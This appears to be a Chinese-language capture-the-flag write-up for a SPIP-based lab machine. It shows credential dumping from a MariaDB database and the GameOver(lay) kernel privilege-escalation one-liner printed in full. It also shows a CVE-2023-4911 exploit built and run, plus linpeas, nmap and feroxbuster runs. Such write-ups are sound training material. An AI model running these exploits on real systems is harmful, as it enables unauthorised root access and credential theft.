cat .bash_history \nwhoami\nexit\nexit\nreset xterm\nexport TERM=xterm-256color\nstty rows 51 cols 197\nls\nnano\nls\ncat config\/connect.php\nmysql -u root -p \n(remote) www-data@pipy:\/var\/www$ cd html\n(remote) www-data@pipy:\/var\/www\/html$ ls -la\ntotal 160\ndrwxr-xr-x 11 www-data www-data 4096 Apr 10 04:46 .\ndrwxr-xr-x 4 www-data www-data 4096 Oct 5 2023 ..\n-rw-r--r-- 1 www-data www-data 7045 Feb 23 2023 CHANGELOG.md\ndrwxr-xr-x 2 www-data www-data 4096 Oct 3 2023 IMG\n-rw-r--r-- 1 www-data www-data 35147 Feb 23 2023 LICENSE\n-rw-r--r-- 1 www-data www-data 842 Feb 23 2023 README.md\n-rw-r--r-- 1 www-data www-data 178 Feb 23 2023 SECURITY.md\n-rw-r--r-- 1 www-data www-data 1761 Feb 23 2023 composer.json\n-rw-r--r-- 1 www-data www-data 27346 Feb 23 2023 composer.lock\ndrwxr-xr-x 2 www-data www-data 4096 Oct 3 2023 config\ndrwxr-xr-x 22 www-data www-data 4096 Oct 3 2023 ecrire\n-rw-r--r-- 1 www-data www-data 4307 Feb 23 2023 htaccess.txt\n-rw-r--r-- 1 www-data www-data 42 Feb 23 2023 index.php\ndrwxr-xr-x 5 www-data www-data 4096 Oct 3 2023 local\ndrwxr-xr-x 22 www-data www-data 4096 Oct 3 2023 plugins-dist\n-rw-r--r-- 1 www-data www-data 3645 Feb 23 2023 plugins-dist.json\ndrwxr-xr-x 12 www-data www-data 4096 Oct 3 2023 prive\n-rw-rw-rw- 1 www-data www-data 55 Apr 10 04:43 revershell.sh\n-rw-r--r-- 1 www-data www-data 973 Feb 23 2023 spip.php\n-rw-r--r-- 1 www-data www-data 1212 Feb 23 2023 spip.png\n-rw-r--r-- 1 www-data www-data 1673 Feb 23 2023 spip.svg\ndrwxr-xr-x 10 www-data www-data 4096 Oct 3 2023 squelettes-dist\ndrwxr-xr-x 5 www-data www-data 4096 Apr 10 04:04 tmp\ndrwxr-xr-x 6 www-data www-data 4096 Oct 3 2023 vendor\n(remote) www-data@pipy:\/var\/www\/html$ cd config\/\n(remote) www-data@pipy:\/var\/www\/html\/config$ ls -la\ntotal 48\ndrwxr-xr-x 2 www-data www-data 4096 Oct 3 2023 .\ndrwxr-xr-x 11 www-data www-data 4096 Apr 10 04:46 ..\n-rw-rw-rw- 1 www-data www-data 197 Oct 3 2023 .htaccess\n-rw-rw-rw- 1 www-data www-data 0 Oct 3 2023 .ok\n-rw-rw-rw- 1 www-data www-data 109 Oct 3 2023 chmod.php\n-rw-rw-rw- 1 www-data www-data 163 Oct 3 2023 cles.php\n-rw-rw-rw- 1 www-data www-data 243 Oct 3 2023 connect.php\n-rw-r--r-- 1 www-data www-data 17240 Feb 23 2023 ecran_securite.php\n-rw-r--r-- 1 www-data www-data 83 Feb 23 2023 remove.txt\n(remote) www-data@pipy:\/var\/www\/html\/config$ cat connect.php \n<?php\nif (!defined("_ECRIRE_INC_VERSION")) return;\ndefined('_MYSQL_SET_SQL_MODE') || define('_MYSQL_SET_SQL_MODE',true);\n$GLOBALS['spip_connect_version'] = 0.8;\nspip_connect_db('localhost','','root','dbpassword','spip','mysql', 'spip','','');<\/code><\/pre>\n\u770b\u5230\u5386\u53f2\u8bb0\u5f55\u7a81\u7136\u4e00\u4e2a\u6fc0\u7075\uff0c\u6740\u4e86\u4e2a\u56de\u9a6c\u67aa\uff0chhh\uff0c\u5dee\u70b9\u9519\u8fc7\u3002<\/p>\n
root\ndbpassword<\/code><\/pre>\n\u67e5\u8be2\u6570\u636e\u5e93<\/h3>\n
\u5c1d\u8bd5\u8fde\u63a5\u6570\u636e\u5e93\uff0c\u5982\u679c\u662f\u76f4\u63a5nc\u7684\u53ef\u80fd\u9700\u8981\u7a33\u5b9a\u4e00\u4e0b\u6570\u636e\u5e93\uff0c\u89c1\u6700\u4e0b\u65b9\uff1a<\/p>\n
(remote) www-data@pipy:\/var\/www\/html\/config$ mysql -u root -p\nEnter password: \nWelcome to the MariaDB monitor. Commands end with ; or \\g.\nYour MariaDB connection id is 1548\nServer version: 10.6.12-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nMariaDB [(none)]> show databases;\n+--------------------+\n| Database |\n+--------------------+\n| information_schema |\n| mysql |\n| performance_schema |\n| spip |\n| sys |\n+--------------------+\n5 rows in set (0.027 sec)\n\nMariaDB [(none)]> use spip;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMariaDB [spip]> show tables;\n+-------------------------+\n| Tables_in_spip |\n+-------------------------+\n| spip_articles |\n| spip_auteurs |\n| spip_auteurs_liens |\n| spip_depots |\n| spip_depots_plugins |\n| spip_documents |\n| spip_documents_liens |\n| spip_forum |\n| spip_groupes_mots |\n| spip_jobs |\n| spip_jobs_liens |\n| spip_meta |\n| spip_mots |\n| spip_mots_liens |\n| spip_paquets |\n| spip_plugins |\n| spip_referers |\n| spip_referers_articles |\n| spip_resultats |\n| spip_rubriques |\n| spip_syndic |\n| spip_syndic_articles |\n| spip_types_documents |\n| spip_urls |\n| spip_versions |\n| spip_versions_fragments |\n| spip_visites |\n| spip_visites_articles |\n+-------------------------+\n28 rows in set (0.001 sec)\n\nMariaDB [spip]> select * from spip_auteurs;\n+-----------+--------+-----+-----------------+----------+----------+--------+-----------------------------------------------+-----------+---------------------+-----+--------+---------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\n| id_auteur | nom | bio | email | nom_site | url_site | login | pass tatut | webmestre | maj | pgp | htpass | en_ligne | alea_actuel prefs cles |\n+-----------+--------+-----+-----------------+----------+----------+--------+-----------------------------------------------+-----------+---------------------+-----+--------+---------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\n| 1 | Angela | | angela@pipy.htb | | | angela | 4ng3l4 minirezo | oui | 2023-10-04 17:28:39 | | | 2023-10-04 13:50:34 | 387046876651c39a45bc836.13502903 a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:""; jg+hKOjCODrOTwhvDGXqQ34zRxFmdchyPL7wVRW3zsPwE6+4q0GlAPo4b4OGRmzvR6NNFdEjARDtoeIAxH88cQZt2H3ENUggrz99vFfCmWHIdJgSDSOc0fCXOCxzCW9NwvzJYM\/u\/8cWGGdRALd7fzFYhOY6DmokVnIlwauc8\/lwRyNbam1H6+g5ju57cI8Dzll+pCMUPhhti9RvC3WNzC2IUcPnHEM= |\n| 2 | admin | | admin@pipy.htb | | | admin | $2y$10$UU8xkGHmmSzrF6elpQWjmeXooyfzHBcomite | non | 2024-04-10 04:37:08 | | | 2023-10-04 17:31:03 | 56364180666161774c5fff8.85980786 a:4:{s:7:"couleur";i:2;s:7:"display";i:2;s:18:"display_navigation";s:22:"navigation_avec_icones";s:3:"cnx";s:0:"";FPNzl4\/wAh9i0D1bqfjYKMJSG63z4KPzonGgNUHz+NmYNLbcIM83Tilz5NYrlGKbw4\/cDDBE1mXohDXwEDagYuW2kAUYeqd8y5XqDogNsLGEJIzn0o= |\n+-----------+--------+-----+-----------------+----------+----------+--------+-----------------------------------------------+-----------+---------------------+-----+--------+---------------------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+\n2 rows in set (0.000 sec)<\/code><\/pre>\n\u554a\u8fd9\uff0c\u4f30\u8ba1\u662f\u592a\u957f\u4e86\uff0c\u5c1d\u8bd5\u51cf\u5c11\u4e00\u4e0b\uff1a<\/p>\n
MariaDB [spip]> show columns from spip_auteurs;\n+--------------+--------------+------+-----+---------------------+-------------------------------+\n| Field | Type | Null | Key | Default | Extra |\n+--------------+--------------+------+-----+---------------------+-------------------------------+\n| id_auteur | bigint(21) | NO | PRI | NULL | auto_increment |\n| nom | text | NO | | '' | |\n| bio | text | NO | | '' | |\n| email | tinytext | NO | | '' | |\n| nom_site | tinytext | NO | | '' | |\n| url_site | text | NO | | '' | |\n| login | varchar(255) | YES | MUL | NULL | |\n| pass | tinytext | NO | | '' | |\n| low_sec | tinytext | NO | | '' | |\n| statut | varchar(255) | NO | MUL | 0 | |\n| webmestre | varchar(3) | NO | | non | |\n| maj | timestamp | NO | | current_timestamp() | on update current_timestamp() |\n| pgp | text | NO | | '' | |\n| htpass | tinytext | NO | | '' | |\n| en_ligne | datetime | NO | MUL | 0000-00-00 00:00:00 | |\n| alea_actuel | tinytext | YES | | NULL | |\n| alea_futur | tinytext | YES | | NULL | |\n| prefs | text | YES | | NULL | |\n| cookie_oubli | tinytext | YES | | NULL | |\n| source | varchar(10) | NO | | spip | |\n| lang | varchar(10) | NO | | | |\n| imessage | varchar(3) | NO | | | |\n| backup_cles | mediumtext | NO | | '' | |\n+--------------+--------------+------+-----+---------------------+-------------------------------+\n23 rows in set (0.001 sec)\n\nMariaDB [spip]> select id_auteur,pass,htpass from spip_auteurs;\n+-----------+--------------------------------------------------------------+--------+\n| id_auteur | pass | htpass |\n+-----------+--------------------------------------------------------------+--------+\n| 1 | 4ng3l4 | |\n| 2 | $2y$10$UU8xkGHmmSzrF6elpQWjmeXooyfzHBLZPxxD4moW.oyCtSB.8i55e | |\n+-----------+--------------------------------------------------------------+--------+\n2 rows in set (0.000 sec)\n\nMariaDB [spip]> select nom,bio,email from spip_auteurs;\n+--------+-----+-----------------+\n| nom | bio | email |\n+--------+-----+-----------------+\n| Angela | | angela@pipy.htb |\n| admin | | admin@pipy.htb |\n+--------+-----+-----------------+\n2 rows in set (0.000 sec)<\/code><\/pre>\n\u5f97\u5230\u7528\u6237\u540d\u548c\u5bc6\u7801\uff1a<\/p>\n
Angela\n4ng3l4 <\/code><\/pre>\n\u5207\u6362Angela<\/h3>\nsu angela\n4ng3l4<\/code><\/pre>\n<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h3>\nangela@pipy:~$ sudo -l\n[sudo] password for angela: \nSorry, user angela may not run sudo on pipy.\nangela@pipy:~$ cat user.txt \ndab37650d43787424362d5805140538d\nangela@pipy:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\n# You can also override PATH, but by default, newer versions inherit it from the environment\n#PATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\nangela@pipy:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n......\u57fa\u672c\u90fd\u65e0\u6cd5\u5229\u7528\nangela@pipy:~$ find \/ -writable -type f 2>\/dev\/null\n......\u4e00\u65e0\u6240\u83b7<\/code><\/pre>\n\u4e0a\u4f20linpeas.sh<\/code>\u548cpspy64<\/code>\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\nangela@pipy:~$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/pipy\n(local) pwncat$ lcd ..\n(remote) angela@pipy:\/home\/angela$ cd \/tmp\n(remote) angela@pipy:\/tmp$ \n(local) pwncat$ upload linpeas.sh\n(local) pwncat$ upload pspy64\n(local) pwncat$\n(remote) angela@pipy:\/tmp$ ls\nlinpeas.sh pspy64\n(remote) angela@pipy:\/tmp$ chmod +x *\n(remote) angela@pipy:\/tmp$ .\/linpeas.sh<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u6709\u54ea\u4e9b\u4fe1\u606f\uff1a<\/p>\n
<\/div><\/p>\n\u4e0apspy64<\/code>\u67e5\u770b\u4e00\u4e0b\uff0c\u7b49\u4e86\u534a\u5929\uff0c\u6bdb\u90fd\u6ca1\u53d1\u73b0\u3002\u3002\u3002<\/p>\n(remote) angela@pipy:\/tmp$ ss -tulnp\nNetid State Recv-Q Send-Q Local Address:Port Peer Address:Port\nudp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:*\nudp UNCONN 0 0 172.20.10.4%enp0s3:68 0.0.0.0:*\ntcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*\ntcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*\ntcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*\ntcp LISTEN 0 1024 127.0.0.1:4226 0.0.0.0:*\ntcp LISTEN 0 511 *:80 *:*\ntcp LISTEN 0 128 [::]:22 [::]:*<\/code><\/pre>\n\u5185\u6838\u63d0\u6743<\/h3>\n
\u4f46\u662f\u6ca1\u6709\u53d1\u73b0\u5565\uff0c\u53ea\u80fd\u5c1d\u8bd5\u6211\u4eec\u6700\u4e0d\u60f3\u8fdb\u884c\u7684\u64cd\u4f5c\u4e86\uff0c\u5c1d\u8bd5\u5185\u6838\u662f\u5426\u6709\u95ee\u9898\u3002\u3002\u3002<\/p>\n
(remote) angela@pipy:\/tmp$ uname -a\nLinux pipy 5.15.0-84-generic #93-Ubuntu SMP Tue Sep 5 17:16:10 UTC 2023 x86_64 x86_64 x86_64 GNU\/Linux\n(remote) angela@pipy:\/tmp$ lsb_release -a\nNo LSB modules are available.\nDistributor ID: Ubuntu\nDescription: Ubuntu 22.04.3 LTS\nRelease: 22.04\nCodename: jammy<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/pipy]\n\u2514\u2500$ searchsploit ubuntu 22.04 \nExploits: No Results\nShellcodes: No Results<\/code><\/pre>\n<\/div><\/p>\n<\/div><\/p>\n\u5148\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
#!\/bin\/bash\n\n# CVE-2023-2640 CVE-2023-3262: GameOver(lay) Ubuntu Privilege Escalation\n# by g1vi https:\/\/github.com\/g1vi\n# October 2023\n\necho "[+] You should be root now"\necho "[+] Type 'exit' to finish and leave the house cleaned"\n\nunshare -rm sh -c "mkdir l u w m && cp \/u*\/b*\/p*3 l\/;setcap cap_setuid+eip l\/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m\/*;" && u\/python3 -c 'import os;os.setuid(0);os.system("cp \/bin\/bash \/var\/tmp\/bash && chmod 4755 \/var\/tmp\/bash && \/var\/tmp\/bash -p && rm -rf l m u w \/var\/tmp\/bash")'<\/code><\/pre>\n\u53bb\u5e74\u5341\u6708\u4efd\u7684\uff0c\u4e5f\u53ef\u80fd\u662f\u8fd9\u4e2a\uff01\u8fd0\u884c\u4e00\u4e0b\uff1a<\/p>\n
(remote) angela@pipy:\/tmp$ vim exploit.sh\n(remote) angela@pipy:\/tmp$ chmod +x exploit.sh \n(remote) angela@pipy:\/tmp$ .\/exploit.sh \n[+] You should be root now\n[+] Type 'exit' to finish and leave the house cleaned\nTraceback (most recent call last):\n File "<string>", line 1, in <module>\nPermissionError: [Errno 1] Operation not permitted\n(remote) angela@pipy:\/tmp$ ls -l exploit.sh \n-rwxrwxr-x 1 angela angela 558 Apr 10 05:56 exploit.sh<\/code><\/pre>\n\u597d\u50cf\u4e0d\u884c\u6b38\uff0c\u7ee7\u7eed\u770b\u770b\u522b\u7684\uff1a<\/p>\n
<\/div><\/p>\n\u7b2c\u56db\u4e2a\u4f3c\u4e4e\u66f4\u7b26\u5408\u6211\u4eec\u7684\u7cfb\u7edfglibc<\/code>\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n(remote) angela@pipy:\/tmp$ \n(local) pwncat$ upload CVE-2023-4911-main.zip\n.\/CVE-2023-4911-main.zip \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 3.7\/3.7 KB \u2022 ? \u2022 0:00:00[02:04:18] uploaded 3.68KiB in 0.31 seconds upload.py:76\n(local) pwncat$ \n(remote) angela@pipy:\/tmp$ ls\nCVE-2023-4911-main.zip exploit.sh l linpeas.sh m pspy64 tmux-1000 u w\n(remote) angela@pipy:\/tmp$ unzip CVE-2023-4911-main.zip \nArchive: CVE-2023-4911-main.zip\n4ecc0713f7f12bc914d07c708ded10c17365ea79\n creating: CVE-2023-4911-main\/\n inflating: CVE-2023-4911-main\/Makefile \n inflating: CVE-2023-4911-main\/README.md \n inflating: CVE-2023-4911-main\/create-libc.py \n inflating: CVE-2023-4911-main\/gdb-script \n inflating: CVE-2023-4911-main\/xpl.c \n(remote) angela@pipy:\/tmp$ ls\nCVE-2023-4911-main CVE-2023-4911-main.zip exploit.sh l linpeas.sh m pspy64 tmux-1000 u w\n(remote) angela@pipy:\/tmp$ cd CVE-2023-4911-main\/\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ ls\ncreate-libc.py gdb-script Makefile README.md xpl.c\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ make\npython3 .\/create-libc.py\n[*] Checking for new versions of pwntools\n To disable this functionality, set the contents of \/home\/angela\/.cache\/.pwntools-cache-3.10\/update to 'never' (old way).\n Or add the following lines to ~\/.pwn.conf or ~\/.config\/pwn.conf (or \/etc\/pwn.conf system-wide):\n [update]\n interval=never\n[*] A newer version of pwntools is available on pypi (4.11.0 --> 4.12.0).\n Update with: $ pip install -U pwntools\ngcc xpl.c -o xpl\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ ls\n'"' create-libc.py gdb-script Makefile README.md xpl xpl.c\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ ls -l*\nls: invalid option -- '*'\nTry 'ls --help' for more information.\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ ls -l xpl\n-rwxrwxr-x 1 angela angela 16544 Apr 10 06:04 xpl\n(remote) angela@pipy:\/tmp\/CVE-2023-4911-main$ .\/xpl\n=============================\n[+] Exploit by DiegoAltF4 [+]\n=============================\n\nStarting bruteforce ...\n\n[0]\n[100]\n[200]\n[300]\n[400]\n[500]\n[600]\n[700]\n[800]\n[900]\n[1000]\n[1100]\n[1200]\n[1300]\n[1400]\n[1500]\n[1600]\n[1700]\n[1800]\n[1900]\n[2000]\n[2100]\n[2200]\n[2300]\n[2400]\n[2500]\n\nUsage:\n su [options] [-] [<user> [<argument>...]]\n\nChange the effective user ID and group ID to that of <user>.\nA mere - implies -l. If <user> is not given, root is assumed.\n\nOptions:\n -m, -p, --preserve-environment do not reset environment variables\n -w, --whitelist-environment <list> don't reset specified variables\n\n -g, --group <group> specify the primary group\n -G, --supp-group <group> specify a supplemental group\n\n -, -l, --login make the shell a login shell\n -c, --command <command> pass a single command to the shell with -c\n --session-command <command> pass a single command to the shell with -c\n and do not create a new session\n -f, --fast pass -f to the shell (for csh or tcsh)\n -s, --shell <shell> run <shell> if \/etc\/shells allows it\n -P, --pty create a new pseudo-terminal\n\n -h, --help display this help\n -V, --version display version\n\nFor more details see su(1).\n[2600]\n[2700]\n[2800]\n^C<\/code><\/pre>\n\u5bc4\u4e86\uff0c\u96be\u9053\u4e0d\u662f\u5185\u6838\u63d0\u6743\uff1f\u53bb\u7ffb\u4e86\u4e00\u4e0b\u522b\u7684\u5e08\u5085\u7684blog\u53d1\u73b0\u771f\u7684\u662f\u3002\u3002\u3002\u800c\u4e14\u8fd8\u662f\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u4f46\u662f\u6211\u6ca1\u8dd1\u51fa\u6765\uff0c\u7ee7\u7eed\u627e\u4e00\u4e0b\uff1a<\/p>\n
nmap -sCV -p 1-65535 172.20.10.4<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n| 256 c0:f6:a1:6a:53:72:be:8d:c2:34:11:e7:e4:9c:94:75 (ECDSA)\n|_ 256 32:1c:f5:df:16:c7:c1:99:2c:d6:26:93:5a:43:57:59 (ED25519)\n80\/tcp open http Apache httpd 2.4.52 ((Ubuntu))\n|_http-server-header: Apache\/2.4.52 (Ubuntu)\n|_http-title: Mi sitio SPIP\n|_http-generator: SPIP 4.2.0\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\nferoxbuster -u http:\/\/172.20.10.4 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 2 -s 200 301 302<\/code><\/pre>\n ___ ___ __ __ __ __ __ ___\n|__ |__ |__) |__) | \/ ` \/ \\ \\_\/ | | \\ |__\n| |___ | \\ | \\ | \\__, \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13 ver: 2.10.2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf Target Url \u2502 http:\/\/172.20.10.4\n \ud83d\ude80 Threads \u2502 50\n \ud83d\udcd6 Wordlist \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c Status Codes \u2502 [200, 301, 302]\n \ud83d\udca5 Timeout (secs) \u2502 7\n \ud83e\udda1 User-Agent \u2502 feroxbuster\/2.10.2\n \ud83d\udc89 Config File \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e Extract Links \u2502 true\n \ud83c\udfc1 HTTP methods \u2502 [GET]\n \ud83d\udd03 Recursion Depth \u2502 2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1 Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n200 GET 9l 14w 186c http:\/\/172.20.10.4\/squelettes-dist\/css\/font.css\n200 GET 612l 1862w 20633c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/lity\/js\/lity.mediabox.js\n200 GET 586l 1191w 8967c http:\/\/172.20.10.4\/squelettes-dist\/css\/typo.css\n200 GET 36l 85w 1272c http:\/\/172.20.10.4\/prive\/spip_pass.html\n200 GET 156l 455w 3750c http:\/\/172.20.10.4\/prive\/paquet.dtd\n200 GET 196l 1309w 11775c http:\/\/172.20.10.4\/prive\/xhtml-lat1.ent\n200 GET 1l 13w 141c http:\/\/172.20.10.4\/prive\/informer_auteur.html\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/prive\/informer_auteur_fonctions.php\n301 GET 9l 28w 310c http:\/\/172.20.10.4\/local => http:\/\/172.20.10.4\/local\/\n200 GET 4l 23w 187c http:\/\/172.20.10.4\/local\/CACHEDIR.TAG\n200 GET 3l 13w 83c http:\/\/172.20.10.4\/local\/remove.txt\n200 GET 1l 7w 436c http:\/\/172.20.10.4\/local\/config.txt\n301 GET 9l 28w 315c http:\/\/172.20.10.4\/javascript => http:\/\/172.20.10.4\/javascript\/\n301 GET 9l 28w 311c http:\/\/172.20.10.4\/vendor => http:\/\/172.20.10.4\/vendor\/\n301 GET 9l 28w 311c http:\/\/172.20.10.4\/config => http:\/\/172.20.10.4\/config\/\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/vendor\/autoload.php\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/config\/connect.php\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/config\/ecran_securite.php\n200 GET 3l 13w 83c http:\/\/172.20.10.4\/config\/remove.txt\n301 GET 9l 28w 308c http:\/\/172.20.10.4\/tmp => http:\/\/172.20.10.4\/tmp\/\n200 GET 0l 0w 0c http:\/\/172.20.10.4\/tmp\/cron.lock\n200 GET 1l 2w 14c http:\/\/172.20.10.4\/tmp\/meta_cache.php\n200 GET 674l 5644w 35147c http:\/\/172.20.10.4\/LICENSE\n200 GET 1l 1w 33c http:\/\/172.20.10.4\/tmp\/menu-rubriques-cache.txt\n200 GET 84l 455w 35410c http:\/\/172.20.10.4\/tmp\/plugin_xml_cache.gz\n200 GET 4l 23w 187c http:\/\/172.20.10.4\/tmp\/CACHEDIR.TAG\n200 GET 56l 146w 1491c http:\/\/172.20.10.4\/prive\/javascript\/jquery.autosave.js\n200 GET 140l 202w 1497c http:\/\/172.20.10.4\/squelettes-dist\/css\/reset.css\n301 GET 9l 28w 308c http:\/\/172.20.10.4\/IMG => http:\/\/172.20.10.4\/IMG\/\n200 GET 3l 13w 80c http:\/\/172.20.10.4\/IMG\/remove.txt\n200 GET 39l 134w 1189c http:\/\/172.20.10.4\/squelettes-dist\/css\/form.css\n200 GET 101l 210w 1667c http:\/\/172.20.10.4\/squelettes-dist\/css\/clear.css\n200 GET 93l 400w 3103c http:\/\/172.20.10.4\/squelettes-dist\/css\/layout.css\n200 GET 880l 3034w 28519c http:\/\/172.20.10.4\/plugins-dist\/porte_plume\/javascript\/jquery.markitup_pour_spip.js\n200 GET 590l 1269w 16249c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/lib\/lity\/lity.js\n200 GET 1162l 4111w 38533c http:\/\/172.20.10.4\/prive\/javascript\/ajaxCallback.js\n200 GET 256l 892w 8312c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/javascript\/spip.mediabox.js\n200 GET 1549l 5417w 42242c http:\/\/172.20.10.4\/prive\/javascript\/jquery.form.js\n200 GET 705l 1688w 22638c http:\/\/172.20.10.4\/local\/cache-js\/jsdyn-javascript_porte_plume_start_js-cffe9b6f.js\n200 GET 206l 419w 4438c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/lity\/css\/lity.mediabox.css\n200 GET 168l 415w 5494c http:\/\/172.20.10.4\/plugins-dist\/porte_plume\/javascript\/jquery.previsu_spip.js\n200 GET 340l 1179w 10765c http:\/\/172.20.10.4\/squelettes-dist\/css\/theme.css\n200 GET 61l 102w 1565c http:\/\/172.20.10.4\/prive\/javascript\/jquery.placeholder-label.js\n200 GET 96l 238w 1662c http:\/\/172.20.10.4\/squelettes-dist\/css\/media.css\n200 GET 59l 166w 5368c http:\/\/172.20.10.4\/local\/cache-css\/cssdyn-css_barre_outils_icones_css-8362435d.css\n200 GET 209l 443w 3798c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/lib\/lity\/lity.css\n200 GET 395l 945w 7784c http:\/\/172.20.10.4\/plugins-dist\/porte_plume\/css\/barre_outils.css\n200 GET 126l 461w 7518c http:\/\/172.20.10.4\/spip.php\n200 GET 163l 316w 2849c http:\/\/172.20.10.4\/plugins-dist\/mediabox\/lity\/skins\/_simple-dark\/lity.css\n200 GET 107l 232w 2093c http:\/\/172.20.10.4\/squelettes-dist\/css\/links.css\n200 GET 212l 925w 7638c http:\/\/172.20.10.4\/squelettes-dist\/css\/spip.css\n200 GET 1l 5w 120c http:\/\/172.20.10.4\/squelettes-dist\/puce.gif\n200 GET 26l 45w 1389c http:\/\/172.20.10.4\/squelettes-dist\/rss_forum_syndic.html\n200 GET 30l 42w 1012c 